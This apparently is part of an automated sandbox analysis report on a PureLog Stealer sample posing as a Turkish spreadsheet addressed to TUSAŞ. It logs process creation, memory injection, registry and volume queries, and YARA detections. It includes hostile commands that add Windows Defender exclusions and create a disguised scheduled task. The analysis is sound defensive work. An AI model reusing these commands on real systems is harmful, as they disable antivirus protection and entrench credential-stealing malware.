Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe"
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe"	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe"	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Memory written: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Memory written: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe base: 400000 value starts with: 4D5A			Jump to behavior

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe"	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe"	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xSjByRHuwGV" /XML "C:\Users\user\AppData\Local\Temp\tmp24B8.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process created: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe "C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe"	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process created: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe "C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xSjByRHuwGV" /XML "C:\Users\user\AppData\Local\Temp\tmp387E.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Process created: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe "C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe"	Jump to behavior

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Queries volume information: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Queries volume information: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Queries volume information: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Queries volume information: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.5b90000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xSjByRHuwGV.exe.3764638.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.5b90000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.34f4cac.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xSjByRHuwGV.exe.3764638.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.34f4cac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.xSjByRHuwGV.exe.3542808.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.32d2e7c.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2183125606.0000000004109000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2186688831.0000000005B90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2226842794.000000000342A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
